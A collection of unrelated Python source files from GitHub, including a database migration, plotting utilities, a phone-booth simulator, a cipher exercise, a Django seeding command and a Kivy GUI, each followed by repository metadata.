    alembic.op.add_column("quotes", sqlalchemy.Column("show_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("shows.id", ondelete="CASCADE", onupdate="CASCADE")))
    alembic.op.execute("""
        UPDATE quotes
        SET
            show_id = shows.id
        FROM shows
        WHERE quotes.show = shows.name
    """)
    alembic.op.execute("""
        UPDATE quotes
        SET
            game_id = game_per_show_data.game_id
        FROM game_per_show_data
        WHERE quotes.game = game_per_show_data.display_name AND game_per_show_data.show_id = quotes.show_id
    """)
    alembic.op.execute("""
        UPDATE quotes
        SET
            game_id = games.id
        FROM games
        WHERE quotes.game = games.name
    """)
    alembic.op.drop_column("quotes", "game")
    alembic.op.drop_column("quotes", "show")
    # Migrated sections are removed from the JSON datafile.
    data.pop("shows", None)
    data.pop("stats", None)
    with open(datafile, "w") as f:
        json.dump(data, f, indent=2, sort_keys=True)
def downgrade():
    """Export the relational game/show/stat data back into the JSON datafile,
    restore the quotes free-text columns, and drop the migrated tables.

    Inverse of :func:`upgrade`; vote nicknames resolved to Twitch ids during
    upgrade are written back by user name.
    """
    conn = alembic.context.get_context().bind
    meta = sqlalchemy.MetaData(bind=conn)
    meta.reflect()
    datafile = alembic.context.config.get_section_option("lrrbot", "datafile", "data.json")
    with open(datafile) as f:
        data = json.load(f)
    data["stats"] = {}
    stats = meta.tables["stats"]
    # NOTE: the loop variable `id` shadows the builtin within this function.
    for id, singular, plural, emote in conn.execute(sqlalchemy.select(stats.c.string_id, stats.c.singular, stats.c.plural, stats.c.emote)):
        data["stats"][id] = {}
        if singular is not None:
            data["stats"][id]["singular"] = singular
        if plural is not None:
            data["stats"][id]["plural"] = plural
        if emote is not None:
            data["stats"][id]["emote"] = emote
    data["shows"] = {}
    shows = meta.tables["shows"]
    games = meta.tables["games"]
    game_per_show_data = meta.tables["game_per_show_data"]
    game_votes = meta.tables["game_votes"]
    game_stats = meta.tables["game_stats"]
    users = meta.tables["users"]
    for fkey, id, name in conn.execute(sqlalchemy.select(shows.c.id, shows.c.string_id, shows.c.name)).fetchall():
        data["shows"][id] = {"name": name, "games": {}}
        # per-show game stats
        query = sqlalchemy.select(games.c.id, games.c.name, stats.c.string_id, game_stats.c.count)
        query = query.select_from(
            game_stats
            .join(games, game_stats.c.game_id == games.c.id)
            .join(stats, game_stats.c.stat_id == stats.c.id)
        )
        query = query.where(game_stats.c.show_id == fkey)
        for game_id, name, stat_id, count in conn.execute(query).fetchall():
            # Negative ids were allocated locally; the JSON keys those games
            # by name instead of by id.
            if game_id < 0:
                game_id = name
            else:
                game_id = str(game_id)
            data["shows"][id]["games"].setdefault(game_id, {"id": game_id, "name": name, "stats": {}, "votes": {}})["stats"][stat_id] = count
        # per-show game votes (written back keyed by user name)
        query = sqlalchemy.select(games.c.id, games.c.name, users.c.name, game_votes.c.vote)
        query = query.select_from(
            game_votes
            .join(games, game_votes.c.game_id == games.c.id)
            .join(users, game_votes.c.user_id == users.c.id)
        )
        query = query.where(game_votes.c.show_id == fkey)
        for game_id, name, user, vote in conn.execute(query).fetchall():
            if game_id < 0:
                game_id = name
            else:
                game_id = str(game_id)
            data["shows"][id]["games"].setdefault(game_id, {"id": game_id, "name": name, "stats": {}, "votes": {}})["votes"][user] = vote
        # per-show display names
        query = sqlalchemy.select(games.c.id, games.c.name, game_per_show_data.c.display_name)
        query = query.select_from(
            game_per_show_data.join(games, game_per_show_data.c.game_id == games.c.id)
        )
        query = query.where(game_per_show_data.c.show_id == fkey)
        for game_id, name, display_name in conn.execute(query).fetchall():
            if game_id < 0:
                game_id = name
            else:
                game_id = str(game_id)
            if display_name is not None:
                data["shows"][id]["games"].setdefault(game_id, {"id": game_id, "name": name, "stats": {}, "votes": {}})["display"] = display_name
    # Restore the quotes free-text columns from the foreign keys.
    alembic.op.add_column("quotes", sqlalchemy.Column("game", sqlalchemy.Text))
    alembic.op.add_column("quotes", sqlalchemy.Column("show", sqlalchemy.Text))
    alembic.op.execute("""
        UPDATE quotes
        SET
            show = shows.name
        FROM shows
        WHERE quotes.show_id = shows.id
    """)
    alembic.op.execute("""
        UPDATE quotes
        SET
            game = games.name
        FROM games
        WHERE quotes.game_id = games.id
    """)
    alembic.op.execute("""
        UPDATE quotes
        SET
            game = game_per_show_data.display_name
        FROM game_per_show_data
        WHERE quotes.game_id = game_per_show_data.game_id AND game_per_show_data.show_id = quotes.show_id
    """)
    alembic.op.drop_column("quotes", "game_id")
    alembic.op.drop_column("quotes", "show_id")
    alembic.op.drop_table("disabled_stats")
    alembic.op.drop_table("game_votes")
    alembic.op.drop_table("game_stats")
    alembic.op.drop_table("stats")
    alembic.op.drop_table("game_per_show_data")
    alembic.op.drop_table("games")
    alembic.op.drop_table("shows")
    with open(datafile, "w") as f:
        json.dump(data, f, indent=2, sort_keys=True)
| mrphlip/lrrbot | alembic/versions/affc03cb46f5_game_data.py | affc03cb46f5_game_data.py | py | 13,052 | python | en | code | 30 | github-code | 50 |
71590351834 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# 概要
plot補助ツール群
# 参考
* [matplotlibでグラフの文字サイズを大きくする](https://goo.gl/E5fLxD)
* [Customizing matplotlib](http://matplotlib.org/users/customizing.html)
"""
import numpy as np
from cycler import cycler
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from matplotlib.ticker import AutoMinorLocator
import colorsys
import matplotlib.font_manager as fm
# Saturation ramp used for the per-hue color cycles below: ``cycle_num``
# evenly spaced values in [v_offset, 1.0], most saturated first.
cycle_num = 6
v_offset = 0.2
s = np.arange(cycle_num) / (cycle_num - 1) * (1 - v_offset) + v_offset
s = s[::-1]


def _hsv_to_hex(hue, saturation, value=0.9):
    """Convert an HSV triple to an ``#RRGGBB`` hex string."""
    r, g, b = colorsys.hsv_to_rgb(hue, saturation, value)
    return "#{:02X}{:02X}{:02X}".format(np.uint8(np.round(r * 0xFF)),
                                        np.uint8(np.round(g * 0xFF)),
                                        np.uint8(np.round(b * 0xFF)))


# Red / green / blue line-style cycles: fixed hue, decreasing saturation.
r_cycle = [_hsv_to_hex(0.0, s_val) for s_val in s]
g_cycle = [_hsv_to_hex(0.3, s_val) for s_val in s]
b_cycle = [_hsv_to_hex(0.6, s_val) for s_val in s]
def _set_common_parameters(fontsize, **kwargs):
    """Apply the shared matplotlib rcParams (font, sizes, grid, line style).

    Only keyword arguments that are present *and* truthy take effect; the
    grid defaults to on when the ``grid`` keyword is absent.
    """
    # Japanese font: prefer "Noto Sans CJK JP" when installed on the system.
    # ---------------------------------------
    for font_file in fm.findSystemFonts():
        font_name = fm.FontProperties(fname=font_file).get_name()
        if font_name == 'Noto Sans CJK JP':
            plt.rcParams['font.family'] = font_name
            plt.rcParams["font.weight"] = 'regular'
            plt.rcParams["axes.labelweight"] = "regular"
            plt.rcParams["axes.titleweight"] = "regular"
            print("{:s} is found".format(font_name))
            break

    # font size
    # ---------------------------------------
    if fontsize:
        plt.rcParams["font.size"] = fontsize
    tick_size = kwargs.get('tick_size')
    if tick_size:
        plt.rcParams['xtick.labelsize'] = tick_size
        plt.rcParams['ytick.labelsize'] = tick_size
    xtick_size = kwargs.get('xtick_size')
    if xtick_size:
        plt.rcParams['xtick.labelsize'] = xtick_size
    ytick_size = kwargs.get('ytick_size')
    if ytick_size:
        plt.rcParams['ytick.labelsize'] = ytick_size
    axis_label_size = kwargs.get('axis_label_size')
    if axis_label_size:
        plt.rcParams['axes.labelsize'] = axis_label_size
    graph_title_size = kwargs.get('graph_title_size')
    if graph_title_size:
        plt.rcParams['axes.titlesize'] = graph_title_size
    legend_size = kwargs.get('legend_size')
    if legend_size:
        plt.rcParams['legend.fontsize'] = legend_size

    # plot style: grid on by default, off only when explicitly falsy
    # ---------------------------------------
    plt.rcParams['axes.grid'] = bool(kwargs.get('grid', True))

    # line style
    # ---------------------------------------
    linewidth = kwargs.get('linewidth')
    if linewidth:
        plt.rcParams['lines.linewidth'] = linewidth
    prop_cycle = kwargs.get('prop_cycle')
    if prop_cycle:
        plt.rcParams['axes.prop_cycle'] = prop_cycle
def plot_1_graph(fontsize=20, **kwargs):
    """Create one configured axes (figure size, limits, title, labels, ticks,
    optional minor grid) and return it.  All styling keywords are optional;
    falsy values are ignored."""
    _set_common_parameters(fontsize=fontsize, **kwargs)

    figsize = kwargs.get('figsize') or (10, 8)
    dpi = kwargs.get('dpi')
    if dpi:
        fig = plt.figure(figsize=figsize, dpi=dpi)
    else:
        fig = plt.figure(figsize=figsize)
    ax1 = fig.add_subplot(111)

    xlim = kwargs.get('xlim')
    if xlim:
        ax1.set_xlim(xlim[0], xlim[1])
    ylim = kwargs.get('ylim')
    if ylim:
        ax1.set_ylim(ylim[0], ylim[1])

    ax1.set_title(kwargs.get('graph_title') or "Title")
    # Axis labels are only set when supplied (no default text here).
    xlabel = kwargs.get('xlabel')
    if xlabel:
        ax1.set_xlabel(xlabel)
    ylabel = kwargs.get('ylabel')
    if ylabel:
        ax1.set_ylabel(ylabel)

    xtick = kwargs.get('xtick')
    if xtick:
        ax1.set_xticks(xtick)
    ytick = kwargs.get('ytick')
    if ytick:
        ax1.set_yticks(ytick)

    # Optional minor tick grid (grey lines, zero-length tick marks).
    minor_xtick_num = kwargs.get('minor_xtick_num')
    if minor_xtick_num:
        ax1.xaxis.set_minor_locator(AutoMinorLocator(minor_xtick_num))
        ax1.xaxis.grid(which='minor', color="#808080")
        ax1.tick_params(axis='x', which='minor', length=0.0)
    minor_ytick_num = kwargs.get('minor_ytick_num')
    if minor_ytick_num:
        ax1.yaxis.set_minor_locator(AutoMinorLocator(minor_ytick_num))
        ax1.yaxis.grid(which='minor', color="#808080")
        ax1.tick_params(axis='y', which='minor', length=0.0)

    # Adjust the layout so labels are not clipped.
    fig.tight_layout()

    return ax1
def plot_1_graph_ret_figure(fontsize=20, **kwargs):
    """Like :func:`plot_1_graph` but returns ``(figure, axes)`` and sets
    placeholder axis labels when none are supplied (no dpi / minor-tick
    handling here)."""
    _set_common_parameters(fontsize=fontsize, **kwargs)

    fig = plt.figure(figsize=kwargs.get('figsize') or (10, 8))
    ax1 = fig.add_subplot(111)

    xlim = kwargs.get('xlim')
    if xlim:
        ax1.set_xlim(xlim[0], xlim[1])
    ylim = kwargs.get('ylim')
    if ylim:
        ax1.set_ylim(ylim[0], ylim[1])

    ax1.set_title(kwargs.get('graph_title') or "Title")
    ax1.set_xlabel(kwargs.get('xlabel') or "X Axis Label")
    ax1.set_ylabel(kwargs.get('ylabel') or "Y Axis Label")

    xtick = kwargs.get('xtick')
    if xtick:
        ax1.set_xticks(xtick)
    ytick = kwargs.get('ytick')
    if ytick:
        ax1.set_yticks(ytick)

    # Adjust the layout so labels are not clipped.
    fig.tight_layout()

    return fig, ax1
def _check_hsv_space():
    """Plot an H-S sweep of the HSV color space (V fixed at 0.9).

    Visual helper used when designing the gradually-lightening line-style
    cycles: shows every hue/saturation combination as a colored square.
    """
    h_num = 11
    s_num = 11
    hues = np.arange(h_num) / (h_num - 1)
    sats = np.arange(s_num) / (s_num - 1)
    f, axarr = plt.subplots(h_num, s_num, sharex='col', sharey='row',
                            figsize=(16, 16))
    for idx in range(h_num * s_num):
        h_idx = idx % h_num
        v_idx = idx // h_num
        r, g, b = colorsys.hsv_to_rgb(hues[h_idx], sats[v_idx], 0.9)
        color = "#{:02X}{:02X}{:02X}".format(np.uint8(np.round(r * 0xFF)),
                                             np.uint8(np.round(g * 0xFF)),
                                             np.uint8(np.round(b * 0xFF)))
        axarr[v_idx, h_idx].add_patch(
            patches.Rectangle((0, 0), 1.0, 1.0, facecolor=color))
    plt.show()
if __name__ == '__main__':
    # _check_hsv_space()
    # sample code for plot_1_graph(): plot several gamma curves on one axes
    # -------------------------------
    x = np.arange(1024) / 1023
    gamma_list = [1.0, 1.2, 1.5, 1.9, 2.4, 3.0]
    # note: the comprehension variable shadows `x` locally but (Python 3
    # comprehension scoping) leaves the outer `x` array untouched
    label_list = ["gamma " + str(x) for x in gamma_list]
    y_list = [x ** gamma for gamma in gamma_list]
    ax1 = plot_1_graph(
        fontsize=20,
        figsize=(10, 8),
        graph_title="Title",
        graph_title_size=None,
        xlabel="X Axis Label", ylabel="Y Axis Label",
        axis_label_size=None,
        legend_size=17,
        xlim=None,
        ylim=None,
        xtick=None,
        ytick=None,
        xtick_size=None, ytick_size=None,
        linewidth=3,
        minor_xtick_num=None,
        minor_ytick_num=None,
        prop_cycle=cycler(color=g_cycle))
    for y, label in zip(y_list, label_list):
        ax1.plot(x, y, label=label)
    plt.legend(loc='upper left')
    plt.show()
| toru-ver4/sip | lib/plot_utility.py | plot_utility.py | py | 8,857 | python | en | code | 4 | github-code | 50 |
class CabineTelefonica:
    """State machine for a coin-operated phone booth.

    States: 'INATIVO' (handset down) and 'AGUARDANDO_MOEDAS' (waiting for
    coins / a phone number).  All monetary amounts are in euros.
    """

    def __init__(self):
        self.saldo = 0.0
        self.estado = 'INATIVO'
        self.numero = ''
        self.valor_moedas_validas = [0.10, 0.20, 0.50, 1.0, 2.0]
        self.moedas_inseridas = []

    def valida_moedas(self, lista_moedas):
        # Every coin must be one of the accepted denominations.
        return all(moeda in self.valor_moedas_validas for moeda in lista_moedas)

    def retorna_moedas(self):
        # Refund everything inserted and reset the booth to idle.
        devolvido = sum(self.moedas_inseridas)
        self.moedas_inseridas = []
        self.saldo = 0.0
        self.estado = 'INATIVO'
        return f"Valor a ser devolvido: {devolvido:.2f} euros"

    def inativo(self, comando):
        # Only lifting the handset leaves the idle state.
        if comando != 'LEVANTAR':
            return "O telefone está inativo. Levante o auscultador para iniciar uma chamada."
        self.estado = 'AGUARDANDO_MOEDAS'
        return "Insira as moedas para a chamada."

    def aguardando_moedas(self, comando):
        if comando == 'ABORTAR':
            return self.retorna_moedas()
        if not comando.startswith('MOEDA'):
            return "Aguarde a inserção das moedas para realizar uma chamada."
        moedas = [float(token) for token in comando.split()[1:]]
        if not self.valida_moedas(moedas):
            return "Moedas inválidas. Insira apenas moedas de 10, 20, 50 centimos, 1 ou 2 euros."
        self.moedas_inseridas.extend(moedas)
        self.saldo = sum(self.moedas_inseridas)
        return f"Saldo atual: {self.saldo:.2f} euros. Digite o número de telefone ou comandos como 'POUSAR' ou 'ABORTAR'."

    def chamada_bloqueada(self):
        # A call ran out of credit: go back to waiting for coins.
        self.estado = 'AGUARDANDO_MOEDAS'
        return "Chamada bloqueada. Insira mais moedas ou desista da chamada."

    def chamada_nacional(self):
        custo = 0.25
        if self.saldo < custo:
            self.estado = 'AGUARDANDO_MOEDAS'
            return f"Saldo insuficiente para realizar a chamada. Insira mais {custo - self.saldo:.2f} euros ou desista da chamada."
        self.saldo -= custo
        self.estado = 'INATIVO'
        return f"Chamada realizada. Saldo atual: {self.saldo:.2f} euros."

    def chamada_internacional(self):
        custo = 1.5
        if self.saldo < custo:
            self.estado = 'AGUARDANDO_MOEDAS'
            return "Saldo insuficiente para realizar a chamada!"
        self.saldo -= custo
        self.estado = 'INATIVO'
        return f"Chamada realizada. Saldo atual: {self.saldo:.2f} euros."
| Alpha241/PL2023 | TPC5/cabine.py | cabine.py | py | 2,641 | python | pt | code | 0 | github-code | 50 |
10270639147 | # -*- coding: utf-8 -*-
"""
Created on Mon Apr 20 14:18:56 2020
@author: cip18jjp
"""
def count_boxes(data, box_size, range_box):
    """
    Count how many grid boxes of side ``box_size`` contain at least one point.

    The grid starts at the data minimum on each axis and covers ``range_box``;
    only boxes fitting entirely within that range are considered.

    Parameters
    ----------
    data : pandas DataFrame / series collection
        Must provide 'x-coord' and 'y-coord' columns.
    box_size : float
        Side length of each (square) box, in data units.
    range_box : float
        Total extent to cover with boxes.

    Returns
    -------
    int
        Number of occupied (non-empty) boxes.
    """
    import numpy as np
    xdata = data['x-coord']
    xmin = xdata.values.min()
    ydata = data['y-coord']
    ymin = ydata.values.min()
    # FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24 —
    # use the builtin int for the truncation instead.
    n_boxes = int(np.floor(range_box / box_size))  # full boxes per axis
    occupied = 0
    for i in range(n_boxes):
        for j in range(n_boxes):
            xcondition = ((xdata >= xmin + i * box_size)
                          & (xdata < xmin + (i + 1) * box_size))
            ycondition = ((ydata >= ymin + j * box_size)
                          & (ydata < ymin + (j + 1) * box_size))
            # Points inside this box satisfy both the x and y condition.
            newid = xdata[xcondition].index.intersection(ydata[ycondition].index)
            if xdata[newid].count() > 0:
                occupied += 1
    return occupied
def f_temp(x, A, Df):
    """
    Linear model ``y = A + Df * x``.

    Intended as the model function for scipy.optimize.curve_fit(), which
    estimates optimal values for A and Df.
    """
    return A + x * Df
| jjp4595/PIN_Productivity_Project | Scripts/fractal_working.py | fractal_working.py | py | 1,437 | python | en | code | 0 | github-code | 50 |
1127226856 | import numpy as np
def separated(values, *, limit, stringify, sep):
    """
    Print up to ``limit`` values with a separator.

    Args:
        values (list): the values to print
        limit (optional, int): the maximum number of values to print (None for no limit)
        stringify (callable): a function to use to convert values to strings
        sep (str): the separator to use between elements (and the "... (NNN more)" continuation)
    """
    count = len(values)
    if limit is not None and count > limit:
        values = values[:limit]
        # FIX: the inner `if count > limit` ternary was redundant here —
        # this branch is only reached when count > limit already holds.
        continuation = f"{sep}... ({count - limit} more)"
    else:
        continuation = ""
    rendered = sep.join(stringify(x) for x in values)
    return rendered + continuation
def comma_sep(values, limit=20, stringify=repr):
    """
    Print up to ``limit`` values, comma separated.

    Args:
        values (list): the values to print
        limit (optional, int): the maximum number of values to print (None for no limit)
        stringify (callable): a function to use to convert values to strings
    """
    separator = ", "
    return separated(values, limit=limit, stringify=stringify, sep=separator)
def require_dataframe_has_columns(name, df, columns):
    """Raise ValueError unless every column in *columns* exists in *df*."""
    has_all = set(columns) <= set(df.columns)
    if not has_all:
        raise ValueError(
            f"{name}: expected {comma_sep(columns)} columns, found: {comma_sep(df.columns)}"
        )
def require_integer_in_range(x, variable_name, min_val=-np.inf, max_val=np.inf):
    """
    Verify that a variable is an integer in a specified closed range.

    Args:
        x: the variable to check
        variable_name (str): the name of the variable to print out in error messages
        min_val: the minimum value that `x` can attain
        max_val: the maximum value that `x` can attain

    Raises:
        TypeError: if `x` is not an int.
        ValueError: if `x` lies outside [min_val, max_val].
    """
    # NOTE(review): isinstance(True, int) is True, so booleans pass this
    # check — confirm whether that is intended before tightening it.
    if not isinstance(x, int):
        raise TypeError(f"{variable_name}: expected int, found {type(x).__name__}")

    if x < min_val or x > max_val:
        # Only mention the binding side(s) of the range in the message.
        if min_val == -np.inf:
            region = f"<= {max_val}"
        elif max_val == np.inf:
            region = f">= {min_val}"
        else:
            region = f"in the range [{min_val}, {max_val}]"
        raise ValueError(f"{variable_name}: expected integer {region}, found {x}")
| stellargraph/stellargraph | stellargraph/core/validation.py | validation.py | py | 2,274 | python | en | code | 2,810 | github-code | 50 |
# Caesar-style substitution cipher over the 21-letter Italian alphabet:
# each letter maps to its successor (and 'z' wraps back to 'a').
dizionario = {'a':'b','b':'c','c':'d','d':'e','e':'f','f':'g','g':'h','h':'i','i':'l','l':'m','m':'n','n':'o','o':'p','p':'q','q':'r',
              'r':'s','s':'t','t':'u','u':'v','v':'z','z':'a'}

parola = input('Inserisci la parola: ')

# Encode: substitute every letter via the dictionary (letters outside the
# alphabet raise KeyError, as in the original lookup).
NuovaStr = ''.join(dizionario[lettera] for lettera in parola)
print(NuovaStr)

# Build the decoder by inverting the encoding dictionary.
decodificatore = {cifrata: chiara for chiara, cifrata in dizionario.items()}

# Decode the encoded word back to the original.
NuovaStr2 = ''.join(decodificatore[lettera] for lettera in NuovaStr)
print(NuovaStr2)
| theCocoCj/Python | cifrario_Cesare.py | cifrario_Cesare.py | py | 636 | python | it | code | 2 | github-code | 50 |
22797019505 | import json
from django.conf import settings
from django.core.management import BaseCommand
from mainapp.models import ProductCategory, Product
from authapp.models import ShopUser
def load_from_json(file_name):
    """Read ``json/<file_name>.json`` under BASE_DIR and return the parsed data."""
    json_path = f'{settings.BASE_DIR}/json/{file_name}.json'
    with open(json_path, encoding='utf-8') as json_file:
        return json.load(json_file)
class Command(BaseCommand):
    """Management command: wipe and re-seed categories, products and a superuser
    from the JSON fixtures in the project's ``json/`` folder."""

    def handle(self, *args, **options):
        categories = load_from_json('categories')
        # FIX: `.all` is a method — it must be called before delete(),
        # otherwise nothing is deleted and an AttributeError is raised.
        ProductCategory.objects.all().delete()
        for cat in categories:
            ProductCategory.objects.create(**cat)

        products = load_from_json('products')
        Product.objects.all().delete()
        for prod in products:
            # Replace the category name from the fixture with the model instance.
            category_name = prod['category']
            _cat = ProductCategory.objects.get(name=category_name)
            prod['category'] = _cat
            # FIX: products must be created as Product, not ProductCategory.
            Product.objects.create(**prod)

        super_user = ShopUser.objects.create_superuser('django',
                                                       'django@geekshop.local', 'geekbrains', age=33)
| ZaharBerdnikov/geekshop | mainapp/management/commands/fill.py | fill.py | py | 1,071 | python | en | code | 0 | github-code | 50 |
70401183515 | import io
import copy
import kivy
from kivy.app import App
from kivy.uix.button import Button
from kivy.uix.filechooser import FileChooserIconView
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.label import Label
from kivy.uix.togglebutton import ToggleButton
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.stacklayout import StackLayout
from kivy.uix.scrollview import ScrollView
from kivy.uix.tabbedpanel import TabbedPanelItem
from kivy.properties import ObjectProperty
from kivy.properties import NumericProperty, BooleanProperty
from kivy.uix.behaviors import ButtonBehavior
from kivy.graphics import Rectangle, Color
from Component import process_component
import GUI_to_code
import glob, os
import pickle
import tkinter as tk
from tkinter import messagebox
from tkinter import filedialog
#import wx
import shutil
import Pyro4
import time
from socket import socket, AF_INET, SOCK_DGRAM, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
kivy.require('1.9.2') # replace with your current kivy version !
# Paths to the component folders and generated/config files (relative to
# this script's directory).
cwd = os.path.dirname(os.path.abspath(__file__))
sep = os.sep
comp_files_path = os.path.join(cwd, r'components', r'comp_files')
flow_control_components_path = os.path.join(cwd, r'components', r'flow control')
GUI_output_path = os.path.join(cwd, r'GUI_output.txt')
GUI_to_code_path = os.path.join(cwd, r'GUI_to_code.py')
objects_uris_path = os.path.join(cwd, r'objects_uris.conf')
python_command = 'python'
program_name = 'Graspy'
file_path_text = 'File path: '
# Field separator used in the serialized program lines (see run_pressed).
line_components_separator = '\t'
# UDP broadcast discovery settings (see update_objects_uris).
MAGIC = 'Broadcast'
seconds_to_listen = 10
broadcast_port_label = 'broadcast_port'
# Component names with special serialization / indentation behavior.
special_comps_list = ['FOR_RANGE', 'IF', 'ELSE_IF', 'ELSE', 'WHILE', 'END', 'START_THREADS', 'new_thread',
                      'end_thread', 'CLOSE_THREADS', 'variable']
indents_comps_list = ['FOR_RANGE', 'IF', 'ELSE_IF', 'ELSE', 'WHILE']
unindents_comps_list = ['ELSE_IF', 'ELSE', 'END']
# Widget attributes persisted by MainScreen.save_file / load_file.
attributes_to_copy = ['outputs_list', 'inputs_dict', 'name', 'text', 'index_number', 'num_of_indents',
                      'inputs', 'inputs_number', 'outputs', 'real_name', 'outputs_number', 'id', 'parallel_state']
categories_components_dict = dict()
# Canvas zoom state: current level and multiplicative step per zoom action.
g_zoom_level = 1
zoom_factor = 4/3
class LeftComponent(Button):
    """Palette button for one available component in the left panel.
    A ``name`` attribute is attached at runtime (see make_components_box);
    visuals presumably come from the accompanying .kv file."""
    pass
class ComponentsArea(StackLayout):
    """Container stacking the LeftComponent buttons of one category tab."""
    pass
class InputButton(ToggleButton):
    """Button for one input of the selected component; name/label/description/
    value/type attributes are attached at runtime (see populate_inputs_list)."""
    pass
class OutputButton(Button):
    """Button for one output name shown in the outputs list panel."""
    pass
class CenterComponent(ButtonBehavior, GridLayout):
    """A component instance placed on the program canvas.

    Carries the component's inputs/outputs, its sequence number on the
    canvas, its flow-control indentation depth and a parallel-execution
    state that cycles through the symbols 'o', '=' and '||'.
    """
    parallel_state = NumericProperty(1)   # index into symbols_list
    inputs_number = NumericProperty(0)
    outputs_number = NumericProperty(0)
    index_number = NumericProperty(0)     # unique sequence number on the canvas
    num_of_indents = NumericProperty(0)   # flow-control nesting depth
    size_of_first = NumericProperty(0)
    unzoom_level = NumericProperty(g_zoom_level)
    font_size = NumericProperty(16)
    start_selected = BooleanProperty(False)
    symbols_list = ['o', '=', '||']
    def change_font_size(self, mylabel):
        """Scale *mylabel*'s font size with the current zoom level."""
        mylabel.font_size = 16 / g_zoom_level
    def change_parallel_state(self, button):
        """Cycle the parallel state (0..2) and update *button*'s symbol."""
        self.parallel_state = (self.parallel_state + 1) % 3
        button.text = self.symbols_list[self.parallel_state]
    def parallel_state_text(self):
        """Return the display symbol for the current parallel state."""
        return self.symbols_list[self.parallel_state]
class SaveDialog(FloatLayout):
    """Save dialog; the properties are callback/widget slots (presumably
    wired in the .kv file — this dialog is not used in the visible code)."""
    save = ObjectProperty(None)
    text_input = ObjectProperty(None)
    cancel = ObjectProperty(None)
class LoadDialog(FloatLayout):
    """Load dialog; `load`/`cancel` are callback slots (presumably wired in
    the .kv file — this dialog is not used in the visible code)."""
    load = ObjectProperty(None)
    cancel = ObjectProperty(None)
class MainScreen(BoxLayout):
    """Root layout of the application.

    Holds the component palette (left tabs), the program canvas (a column of
    CenterComponent widgets) and the input/output editing panel. Manages
    selection state, flow-control indentation, wiring of component outputs
    into inputs, and save/load/run of the assembled program.
    """
    but = CenterComponent()
    current_indentation = NumericProperty(0)
    current_component = None         # CenterComponent whose inputs are edited
    current_output_component = None  # CenterComponent chosen as output source
    current_input = None
    user_selected = BooleanProperty(True)  # True: value typed by user; False: wired from a component
    selected_index = 0
    current_comp_id_number = 0
    components_list = []
    new_categories_set = set()
    input_list = BooleanProperty(False)
    max_canvas_width = NumericProperty(0)
    start_selected = BooleanProperty(True)
    def __init__(self):
        super().__init__()
    def start_component_pressed(self, my_widget):
        """Select the START marker: reset indentation, deselect components."""
        self.start_selected = True
        self.current_indentation = 0
        for index, widget in enumerate(self.ids.main_canvas.children):
            if widget == my_widget:
                self.selected_index = index
            if isinstance(widget, CenterComponent):
                widget.start_selected = False
    def remove_component(self, id):
        """Remove the first canvas widget whose id matches *id*."""
        this_widget_list = filter(lambda x: x.id == id, self.ids.main_canvas.children)
        self.ids.main_canvas.remove_widget(next(this_widget_list))
        # for widget in self.ids.main_canvas.children:
        #     if widget.id == id:
        #         self.ids.main_canvas.remove_widget(widget)
    def left_component_pressed(self, widget):
        """Instantiate the palette component *widget* onto the main canvas.

        Copies the component's declared inputs/outputs, assigns a unique id
        and adjusts indentation for flow-control components.
        """
        self.start_selected = False
        for other_widget in self.ids.main_canvas.children:
            if isinstance(other_widget, CenterComponent):
                other_widget.start_selected = False
        m_canvas = self.ids.main_canvas
        but = CenterComponent()
        but.bind(on_release=self.center_component_pressed)
        but.name = widget.name
        but.text = widget.text
        but.index_number = self.current_comp_id_number
        but.unzoom_level = g_zoom_level
        but.start_selected = True
        inputs_dict = dict()
        outputs_list = list()
        try:
            this_comp = [component for component in self.components_list
                         if component.component_name == widget.name].__getitem__(0)
            if (this_comp.component_name in unindents_comps_list) and self.current_indentation == 0:
                return
            for input in this_comp.inputs:
                inputs_dict[input.label] = input.value
            but.inputs_number = len(this_comp.inputs)
            but.inputs = copy.deepcopy(this_comp.inputs)
        except (IndexError, TypeError):
            but.inputs_number = 0
            but.inputs = []
        try:
            this_comp = [component for component in self.components_list
                         if component.component_name == widget.name].__getitem__(0)
            for output in this_comp.outputs:
                outputs_list.append(output.label)
            but.outputs_list = outputs_list
            but.outputs_number = len(outputs_list)
            but.outputs = copy.deepcopy(this_comp.outputs)
            but.real_name = this_comp.component_name
        except (IndexError, TypeError):
            but.outputs_number = 0
            but.outputs_list = []
            but.real_name = widget.name
        print(but.real_name)
        but.inputs_dict = inputs_dict
        but.id = widget.name + '_' + str(self.current_comp_id_number)
        if this_comp.component_name in unindents_comps_list:
            self.current_indentation -= 1
        but.num_of_indents = self.current_indentation
        if this_comp.component_name in indents_comps_list:
            self.current_indentation += 1
        self.max_canvas_width = max(self.max_canvas_width, but.width + self.current_indentation * 40)
        but.remove_component = self.remove_component
        print(but.num_of_indents)
        m_canvas.add_widget(but, self.selected_index)
        self.current_comp_id_number += 1
    def center_component_pressed(self, my_widget):
        """Handle a click on a placed component.

        In user-input mode, select it for editing; otherwise treat it as the
        output source for the input currently being wired.
        """
        if self.user_selected:
            print(my_widget.num_of_indents)
            self.start_selected = False
            self.current_component = my_widget
            self.current_indentation = my_widget.num_of_indents + (1 if my_widget.real_name in indents_comps_list else 0)
            # self.ids.inputs_list.clear_widgets()
            for index, widget in enumerate(self.ids.main_canvas.children):
                if isinstance(widget, CenterComponent):
                    widget.start_selected = False
                    if widget == my_widget:
                        widget.start_selected = True
                        self.selected_index = index
            self.populate_inputs_list(my_widget)
            self.set_values_to_default()
            self.ids.component_inputs_label.text = my_widget.text + ' ' + str(my_widget.index_number)
        else:
            self.current_output_component = my_widget
            for index, widget in enumerate(self.ids.main_canvas.children):
                if widget == my_widget:
                    if index > self.selected_index:
                        self.populate_outputs_list(my_widget)
                    else:
                        self.ids.outputs_list.clear_widgets()
                        self.ids.selected_output.text = 'select component'
    def make_components_box(self, category_name):
        """Build the stack of palette buttons for *category_name*."""
        components_area = ComponentsArea()
        components_area.id = category_name + '_box'
        if category_name in categories_components_dict.keys():
            for component in categories_components_dict[category_name]:
                comp = LeftComponent()
                comp.bind(on_release=self.left_component_pressed)
                comp.name = component[1]
                comp.text = component[0]
                components_area.add_widget(comp)
        return components_area
    def make_new_category(self, category_name, index=0):
        """Add a new tab (with a scrollable component box) for a category."""
        components_categories = self.ids.components_categories
        new_tab = TabbedPanelItem()
        new_tab.id = category_name
